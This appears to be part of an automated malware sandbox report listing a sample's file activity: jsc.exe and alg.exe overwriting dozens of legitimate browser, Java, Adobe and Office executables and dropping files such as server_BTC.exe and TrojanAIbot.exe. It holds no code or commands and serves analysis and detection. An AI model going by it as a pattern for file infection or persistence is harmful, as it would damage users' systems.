Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	File created: C:\Users\user\RJKUWSGxej.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

File created: C:\Users\user\RJKUWSGxej.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
